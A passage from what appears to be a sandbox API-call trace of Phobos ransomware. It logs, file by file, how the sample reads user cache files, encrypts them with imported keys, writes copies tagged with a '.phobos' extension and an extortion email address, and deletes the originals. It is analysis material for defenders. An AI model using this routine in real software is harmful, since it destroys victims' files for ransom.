pdwDataLen=0x2a0fa80*=0x50) returned 1 [0201.029] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.029] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0201.029] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.029] CloseHandle (hObject=0x13c) returned 1 [0201.029] CloseHandle (hObject=0x174) returned 1 [0201.029] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db")) returned 1 [0201.030] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0201.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.030] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=145) returned 1 [0201.030] CloseHandle (hObject=0x174) returned 1 [0201.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\desktop.ini")) returned 0x2026 [0201.031] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.031] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.031] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.031] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0201.031] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.031] ReadFile (in: hFile=0x174, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91, lpOverlapped=0x0) returned 1 [0201.032] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0, dwBufLen=0xa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0) returned 1 [0201.032] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa0, lpOverlapped=0x0) returned 1 [0201.033] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0201.033] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.033] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0201.033] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.033] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0201.033] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.033] CloseHandle (hObject=0x174) returned 1 [0201.033] CloseHandle (hObject=0x13c) returned 1 [0201.033] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\desktop.ini")) returned 1 [0201.034] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0201.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.035] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=145) returned 1 [0201.035] CloseHandle (hObject=0x13c) returned 1 [0201.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini")) returned 0x2026 [0201.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.035] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.035] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0201.036] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.036] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91, lpOverlapped=0x0) returned 1 [0201.036] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0, dwBufLen=0xa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0) returned 1 [0201.036] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa0, lpOverlapped=0x0) returned 1 [0201.037] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0201.037] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.037] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0201.037] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.037] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0201.037] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.037] CloseHandle (hObject=0x13c) returned 1 [0201.038] CloseHandle (hObject=0x174) returned 1 [0201.038] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\desktop.ini")) returned 1 [0201.038] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0201.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.039] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16384) returned 1 [0201.039] CloseHandle (hObject=0x174) returned 1 [0201.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")) returned 0x2026 [0201.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.039] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.039] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.042] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0201.042] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.042] ReadFile (in: hFile=0x174, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4000, lpOverlapped=0x0) returned 1 [0201.095] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010, dwBufLen=0x4010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010) returned 1 [0201.095] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4010, lpOverlapped=0x0) returned 1 [0201.098] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328e8) returned 1 [0201.098] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.098] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0201.098] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.098] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0201.098] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.098] CloseHandle (hObject=0x174) returned 1 [0201.098] CloseHandle (hObject=0x13c) returned 1 [0201.099] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")) returned 1 [0201.099] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0201.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.100] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0201.100] CloseHandle (hObject=0x13c) returned 1 [0201.100] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini")) returned 0x2026 [0201.100] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.101] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.101] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.101] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0201.101] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.101] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0201.102] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0201.102] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0201.103] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328e8) returned 1 [0201.103] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.103] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0201.103] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.103] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0201.103] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.103] CloseHandle (hObject=0x13c) returned 1 [0201.103] CloseHandle (hObject=0x174) returned 1 [0201.103] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini")) returned 1 [0201.104] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0201.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.114] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0201.114] CloseHandle (hObject=0x174) returned 1 [0201.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini")) returned 0x2026 [0201.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.115] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.115] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0201.115] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.116] ReadFile (in: hFile=0x174, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0201.116] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0201.116] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0201.117] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328e8) returned 1 [0201.117] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.117] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0201.117] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.117] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0201.117] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.117] CloseHandle (hObject=0x174) returned 1 [0201.117] CloseHandle (hObject=0x13c) returned 1 [0201.117] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini")) returned 1 [0201.118] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0201.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.119] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0201.119] CloseHandle (hObject=0x13c) returned 1 [0201.119] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 